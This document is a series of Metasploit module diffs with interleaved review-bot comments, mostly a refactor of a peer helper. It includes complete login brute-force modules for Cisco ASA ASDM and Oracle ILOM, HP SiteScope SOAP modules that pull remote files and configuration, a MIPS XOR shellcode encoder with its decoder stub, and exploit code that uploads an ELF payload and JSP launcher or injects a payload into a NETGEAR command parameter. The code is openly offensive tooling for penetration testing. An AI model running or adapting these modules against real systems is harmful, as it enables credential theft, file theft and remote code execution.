OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']),
OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco'])
], self.class)
end
def run_host(ip)
unless check_conn?
print_error("#{peer} - Connection failed, Aborting...")
return
end
unless is_app_asdm?
print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.")
return
end
print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.")
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
# Verify whether the connection is working or not
def check_conn?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
print_good("#{peer} - Server is responsive...")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
return
end
end
# Verify whether we're working with ASDM or not
def is_app_asdm?
res = send_request_cgi(
{
'uri' => '/+webvpn+/index.html',
'method' => 'GET',
'agent' => 'ASDM/ Java/1.6.0_65'
})
if res &&
res.code == 200 &&
res.headers['Set-Cookie'].match(/webvpn/)
return true
else
return false
end
end
# Brute-force the login page
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi({
'uri' => '/+webvpn+/index.html',
'method' => 'POST',
'agent' => 'ASDM/ Java/1.6.0_65',
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie' => 'webvpnlogin=1; tg=0DefaultADMINGroup',
'vars_post' => {
'username' => user,
'password' => pass,
'tgroup' => 'DefaultADMINGroup'
}
})
if res &&
res.code == 200 &&
res.body.match(/SSL VPN Service/) &&
res.body.match(/Success/) &&
res.body.match(/success/)
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Cisco ASA ASDM',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{peer} - HTTP Connection Failed, Aborting")
return :abort
end
end
end
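Review bot: check_conn? assigns `res` but never inspects it, and its success path returns whatever `print_good(...)` returns rather than an explicit true, so a nil (timed-out) response is reported as responsive and run_host's `unless check_conn?` depends on print_good's return value. Write the body as `return false unless res`, then the print_good, then `true`, and make the rescue branch `return false`. In is_app_asdm?, `res.headers['Set-Cookie'].match(/webvpn/)` raises NoMethodError when a 200 response carries no Set-Cookie header; `res.headers['Set-Cookie'].to_s.match(/webvpn/)` keeps the check false instead. In do_login, `res.body.match(/Success/) && res.body.match(/success/)` could be a single case-insensitive match if that is the intent, and a comment should say why both spellings are required if it is not.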


@ -62,11 +62,11 @@ class Metasploit3 < Msf::Auxiliary
# #
sid, token = get_sid_token sid, token = get_sid_token
if sid.nil? or token.nil? if sid.nil? or token.nil?
print_error("#{@peer} - Unable to obtain session ID or token, cannot continue") print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort return :abort
else else
vprint_status("#{@peer} - Using sessiond ID: #{sid}") vprint_status("#{peer} - Using sessiond ID: #{sid}")
vprint_status("#{@peer} - Using token: #{token}") vprint_status("#{peer} - Using token: #{token}")
end end
begin begin
@ -86,18 +86,18 @@ class Metasploit3 < Msf::Auxiliary
} }
}) })
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond") vprint_error("#{peer} - Service failed to respond")
return :abort return :abort
end end
if res.nil? if res.nil?
print_error("#{@peer} - Connection timed out") print_error("#{peer} - Connection timed out")
return :abort return :abort
end end
location = res.headers['Location'] location = res.headers['Location']
if res and res.headers and (location = res.headers['Location']) and location =~ /admin\// if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"") print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({ report_auth_info({
:host => rhost, :host => rhost,
:port => rport, :port => rport,
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
}) })
return :next_user return :next_user
else else
vprint_error("#{@peer} - Bad login: \"#{user}:#{pass}\"") vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
return return
end end
end end
@ -117,10 +117,9 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = target_uri.path @uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)
} }
end end
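Review bot: `location = res.headers['Location']` is immediately overwritten by the assignment inside the next condition, and `res and res.headers and` there re-tests a `res` that `if res.nil?` has already rejected; drop the standalone assignment and start the condition at `if (location = res.headers['Location']) and location =~ /admin\//`. do_login begins outside the hunk.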


@ -47,18 +47,17 @@ class Metasploit4 < Msf::Auxiliary
end end
def run_host(ip) def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface") print_status("#{peer} - Connecting to SiteScope SOAP Interface")
res = send_request_cgi({ res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl", 'uri' => "#{@uri}services/APISiteScopeImpl",
'method' => 'GET'}) 'method' => 'GET'})
if not res if not res
print_error("#{@peer} - Unable to connect") print_error("#{peer} - Unable to connect")
return return
end end
@ -66,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
end end
def accessfile def accessfile
print_status("#{@peer} - Retrieving the target hostname") print_status("#{peer} - Retrieving the target hostname")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n" data << "<wsns0:Envelope" + "\r\n"
@ -108,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary
end end
if not host_name or host_name.empty? if not host_name or host_name.empty?
print_error("#{@peer} - Failed to retrieve the host name") print_error("#{peer} - Failed to retrieve the host name")
return return
end end
print_status("#{@peer} - Retrieving the file contents") print_status("#{peer} - Retrieving the file contents")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n" data << "<wsns0:Envelope" + "\r\n"
@ -153,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1 boundary = $1
end end
if not boundary or boundary.empty? if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
return return
end end
@ -161,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1 cid = $1
end end
if not cid or cid.empty? if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
return return
end end
@ -169,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1) loot = Rex::Text.ungzip($1)
end end
if not loot or loot.empty? if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
return return
end end
f = ::File.basename(datastore['RFILE']) f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}") print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return return
end end
print_error("#{@peer} - Failed to retrieve the file contents") print_error("#{peer} - Failed to retrieve the file contents")
end end
end end
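Review bot: The four failure paths in accessfile all print `"#{peer} - Failed to retrieve the file contents"`, so the output cannot show whether the MIME boundary, the content-id, the gzip payload or the final response was the stage that failed; give each its own message (e.g. `print_error("#{peer} - No MIME boundary in response")`), or at least a vprint_error naming the stage before the shared line. The two SiteScope sections that follow repeat the same pattern with "Failed to retrieve the SiteScope Configuration" and "Failed to retrieve the file". accessfile's response parsing starts outside the hunk.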


@ -48,11 +48,10 @@ class Metasploit4 < Msf::Auxiliary
end end
def run_host(ip) def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface") print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl') uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -61,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'}) 'method' => 'GET'})
if not res if not res
print_error("#{@peer} - Unable to connect") print_error("#{peer} - Unable to connect")
return return
end end
@ -85,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>" data << "</wsns0:Envelope>"
print_status("#{@peer} - Retrieving the SiteScope Configuration") print_status("#{peer} - Retrieving the SiteScope Configuration")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl') uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -104,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1 boundary = $1
end end
if not boundary or boundary.empty? if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return return
end end
@ -112,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1 cid = $1
end end
if not cid or cid.empty? if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return return
end end
@ -120,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1) loot = Rex::Text.ungzip($1)
end end
if not loot or loot.empty? if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return return
end end
path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration")
print_status("#{@peer} - HP SiteScope Configuration saved in #{path}") print_status("#{peer} - HP SiteScope Configuration saved in #{path}")
print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data") print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data")
return return
end end
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
end end
end end


@ -47,11 +47,10 @@ class Metasploit4 < Msf::Auxiliary
end end
def run_host(ip) def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface") print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APIMonitorImpl') uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -60,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'}) 'method' => 'GET'})
if not res if not res
print_error("#{@peer} - Unable to connect") print_error("#{peer} - Unable to connect")
return return
end end
@ -89,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>" + "\r\n" data << "</wsns0:Envelope>" + "\r\n"
print_status("#{@peer} - Retrieving the file contents") print_status("#{peer} - Retrieving the file contents")
uri = normalize_uri(@uri, 'services/APIMonitorImpl') uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -105,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m
loot = CGI.unescapeHTML($1) loot = CGI.unescapeHTML($1)
if not loot or loot.empty? if not loot or loot.empty?
print_status("#{@peer} - Retrieved empty file") print_status("#{peer} - Retrieved empty file")
return return
end end
f = ::File.basename(datastore['RFILE']) f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}") print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return return
end end
print_error("#{@peer} - Failed to retrieve the file") print_error("#{peer} - Failed to retrieve the file")
end end
end end


@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info, super(update_info(info,
'Name' => 'OpenMind Message-OS Portal Login Brute Force Utility', 'Name' => 'OpenMind Message-OS Portal Login Brute Force Utility',
'Description' => %{ 'Description' => %{
This module scans for OpenMind Message-OS provisioning web login portal, and performs login brute force This module scans for OpenMind Message-OS provisioning web login portal, and
to identify valid credentials. performs a login brute force attack to identify valid credentials.
}, },
'Author' => 'Author' =>
[ [


@ -0,0 +1,115 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle ILO Manager Login Brute Force Utility',
'Description' => %{
This module scans for Oracle Integrated Lights Out Manager (ILO) login portal, and
performs a login brute force attack to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443)
], self.class)
end
def run_host(ip)
unless is_app_oilom?
return
end
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the target actually isn't Oracle ILOM
#
def is_app_oilom?
begin
res = send_request_cgi(
{
'uri' => '/iPages/i_login.asp',
'method' => 'GET'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
vprint_error("#{peer} - HTTP Connection Failed...")
return false
end
if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager"))
vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...")
return true
else
vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.")
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/iPages/loginProcessor.asp',
'method' => 'POST',
'vars_post' =>
{
'sclink' => '',
'username' => user,
'password' => pass,
'button' => 'Log+In'
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
vprint_error("#{peer} - HTTP Connection Failed...")
return :abort
end
if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString"))
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Oracle Integrated Lights Out Manager Portal',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
end
end
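Review bot: `res.headers['Server'].include?("Oracle-ILOM-Web-Server")` in is_app_oilom? raises NoMethodError on any 200 response without a Server header, and that error is not in the rescue list above it; `res.headers['Server'].to_s.include?("Oracle-ILOM-Web-Server")` makes it a plain false. The rescue list in is_app_oilom? omits `::Errno::EPIPE` while do_login's includes it; align the two. In run_host a non-ILOM target exits silently at the default verbosity because the reason is only vprint_error'd; a print_error there would match the ASDM module in this commit.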


@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
'cookie' => sid 'cookie' => sid
}) })
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond") vprint_error("#{peer} - Service failed to respond")
return :abort return :abort
end end
@ -86,9 +86,9 @@ class Metasploit3 < Msf::Auxiliary
when /User name already confirmed/ when /User name already confirmed/
return :skip_user return :skip_user
when /Invalid password/ when /Invalid password/
vprint_status("#{@peer} - Username found: #{user}") vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/ else /\<a href="process\.php\?logout=1"\>/
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"") print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({ report_auth_info({
:host => rhost, :host => rhost,
:port => rport, :port => rport,
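Review bot: `else /\<a href="process\.php\?logout=1"\>/` is not a pattern test — Ruby parses the regex as a discarded expression following `else`, so any response that misses the earlier `when` arms reaches `print_good` and is recorded through `report_auth_info` as a valid login, which makes the credentials this module stores untrustworthy. The refactor keeps the line as context; it should become `when /\<a href="process\.php\?logout=1"\>/` with a separate `else` that reports the unexpected reply, e.g. `vprint_error("#{peer} - Unexpected reply")`. The enclosing method and its `case` begin outside the hunk.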
@ -108,10 +108,9 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)
} }
end end


@ -0,0 +1,146 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasm'
class Metasploit3 < Msf::Encoder::Xor
Rank = NormalRanking
def initialize
super(
'Name' => 'Byte XORi Encoder',
'Description' => %q{
Mips Web server exploit friendly xor encoder. This encoder has been found useful on
situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS
architectures, this one is based on the xori instruction.
},
'Author' =>
[
'Julien Tinnes <julien at cr0.org>', # original longxor encoder, which this one is based on
'juan vazquez' # byte_xori encoder
],
'Arch' => ARCH_MIPSBE,
'License' => MSF_LICENSE,
'Decoder' =>
{
'KeySize' => 1,
'BlockSize' => 1,
'KeyPack' => 'C',
})
end
#
# Returns the decoder stub that is adjusted for the size of the buffer
# being encoded.
#
def decoder_stub(state)
# add 4 number of passes for the space reserved for the key, at the end of the decoder stub
# (see commented source)
number_of_passes=state.buf.length+4
raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 32766
# 16-bits not (again, see also commented source)
reg_14 = (number_of_passes+1)^0xFFFF
decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data
main:
li macro reg, imm
addiu reg, $0, imm ; 0x24xxyyyy - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff
endm
li ($14, #{reg_14}) ; 0x240exxxx - store in $14 the number of passes (two's complement) - xxxx (number of passes)
nor $14, $14, $0 ; 0x01c07027 - get in $14 the number of passes
li ($11,-69) ; 0x240bffbb - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)
; acts as getpc
next:
bltzal $8, next ; 0x0510ffff - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.
slti $8, $0, 0x#{slti_imm(state)} ; 0x2808xxxx - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm
nor $11, $11, $0 ; 0x01605827 - get in $11 the offset to the end of the decoder (from the addu instr)
addu $25, $31, $11 ; 0x03ebc821 - get in $25 a pointer to the end of the decoder stub
slti $23, $0, 0x#{slti_imm(state)} ; 0x2817xxxx - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm
lb $17, -1($25) ; 0x8f31fffc - Load xor key in $17 (stored on the last byte of the decoder stub)
; Init $6 and $15
li ($13, -4) ; 0x240dfffc - $13 = -4
nor $6, $13, $0 ; 0x01a03027 - $6 = 3 ; used to easily get the cacheflush parameter
addi $15, $6, -2 ; 0x20cffffe - $15 = 1 ($15 = decoding loop counter increment)
; In order avoid null bytes, decode also the xor key, so memory can be
; referenced with offset -1
loop:
lb $8, -4($25) ; 0x8f28fffc - Load in $8 the byte to decode
addu $23, $23, $15 ; 0x02efb821 - Increment the counter ($23)
xori $3, $8, 0x#{padded_key(state)} ; 0x01111826 - xori decoding instruction, store the decoded byte on $3
#{set_on_less_than(state)} ; 0x02eef0xx - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt
sb $3, -4($25) ; 0xaf23fffc - Store decoded byte on memory
bne $0, $30, loop ; 0x17c0fff9 - branch to loop if $30 != 0 (ranch while bytes to decode)
addu $25, $25, $15 ; 0x032dc821 - next instruction to decode, executed because of the pipelining
li ($2, 4147) ; 0x24021033 - cacheflush sytem call
syscall 0x52950 ; 0x014a540c
nop ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop
EOS
return decoder
end
def padded_key(state, size=1)
key = Rex::Text.rand_text(size, state.badchars)
key << [state.key].pack("C")
return key.unpack("n")[0].to_s(16)
end
# Returns an two-bytes immediate value without badchars. The value must be
# on the 0x8000-0x8fff so it is used as negative value by slti (set less
# than signed immediate)
def slti_imm(state)
imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack("C*"))
return imm.unpack("n")[0].to_s(16)
end
# Since 0x14 contains the number of passes, and because of the li macro, can't be
# longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used
# here
def set_on_less_than(state)
instructions = {
"sltu $30, $23, $14" => "\x02\xee\xf0\x2b", # set less than unsigned
"slt $30, $23, $14" => "\x02\xee\xf0\x2a" # set less than
}
instructions.each do |k,v|
if Rex::Text.badchar_index(v, state.badchars) == nil
return k
end
end
raise BadcharError.new,
"The #{self.name} encoder failed to encode the decoder stub without bad characters.",
caller
end
def encode_finalize_stub(state, stub)
# Including the key into the stub by ourselves because it should be located
# in the last 4 bytes of the decoder stub. In this way decoding will convert
# these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports
# one decoder_key_offset position
real_key = state.key
stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
return stub
end
end
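Review bot: `padded_key` has no comment and its return value is easy to misread: it builds a 16-bit immediate whose low byte is `state.key` and whose high byte is a random byte drawn outside `state.badchars`, and only the low byte ever reaches memory because the loop decodes with `xori` but stores with `sb`, so the high byte exists purely to keep the instruction encoding free of bad characters. I would add above the method: `# Returns the xori immediate as hex: low byte is state.key, high byte is random non-badchar filler discarded by the sb store.` The `size` parameter is never overridden by the callers in this file and could be dropped, and the comment before `set_on_less_than` should read `$14` rather than `0x14`, matching the register named in the stub.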


@ -48,10 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def peer
return "#{rhost}:#{rport}"
end
def uri def uri
return target_uri.path return target_uri.path
end end


@ -140,40 +140,38 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to login")
print_status("#{@peer} - Trying to login")
if login if login
print_good("#{@peer} - Login successful") print_good("#{peer} - Login successful")
else else
fail_with(Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options") fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options")
end end
exploit_native exploit_native
end end
def exploit_native def exploit_native
print_status("#{@peer} - Uploading executable Payload file") print_status("#{peer} - Uploading executable Payload file")
elf = payload.encoded_exe elf = payload.encoded_exe
elf_location = "/tmp" elf_location = "/tmp"
elf_filename = "#{rand_text_alpha_lower(8)}.elf" elf_filename = "#{rand_text_alpha_lower(8)}.elf"
if upload_file(elf_location, elf_filename, elf) if upload_file(elf_location, elf_filename, elf)
register_files_for_cleanup("#{elf_location}/#{elf_filename}") register_files_for_cleanup("#{elf_location}/#{elf_filename}")
else else
fail_with(Failure::Unknown, "#{@peer} - Payload upload failed") fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end end
print_status("#{@peer} - Uploading JSP to execute the payload") print_status("#{peer} - Uploading JSP to execute the payload")
jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}")
jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m"
jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp"
if upload_file(jsp_location, jsp_filename, jsp) if upload_file(jsp_location, jsp_filename, jsp)
register_files_for_cleanup("#{jsp_location}/#{jsp_filename}") register_files_for_cleanup("#{jsp_location}/#{jsp_filename}")
else else
fail_with(Failure::Unknown, "#{@peer} - JSP upload failed") fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end end
print_status("#{@peer} - Executing payload") print_status("#{peer} - Executing payload")
send_request_cgi( send_request_cgi(
{ {
'uri' => normalize_uri(target_uri.path, "m", jsp_filename), 'uri' => normalize_uri(target_uri.path, "m", jsp_filename),


@ -15,10 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'NETGEAR ReadyNAS Perl Code Evaluation', 'Name' => 'NETGEAR ReadyNAS Perl Code Evaluation',
'Description' => %q{ 'Description' => %q{
This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
vulnerability exists on the web fronted, specifically on the np_handler.pl component, vulnerability exists on the web front end, specifically in the np_handler.pl component,
due to the insecure usage of the eval() perl function. This module has been tested due to an insecure usage of the eval() perl function. This module has been tested
successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment.
hardware.
}, },
'Author' => 'Author' =>
[ [
@ -49,6 +48,8 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Targets' => 'Targets' =>
[ [
# Tested on an emulated environment, need to check this
# against a real device
[ 'NETGEAR ReadyNAS 4.2.23', { }] [ 'NETGEAR ReadyNAS 4.2.23', { }]
], ],
'DefaultOptions' => 'DefaultOptions' =>


@ -69,11 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page # retrieve software version from login page
print_status("#{@peer} - Sending check") print_status("#{peer} - Sending check")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/' 'uri' => '/'
@ -86,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
@ -98,14 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("&#{payload.raw}&") cmd = Rex::Text.uri_encode("&#{payload.raw}&")
# send payload # send payload
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)") print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => "/admin/system.html?step=2&device=lo#{cmd}", 'uri' => "/admin/system.html?step=2&device=lo#{cmd}",
@ -116,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
if res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/ if res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
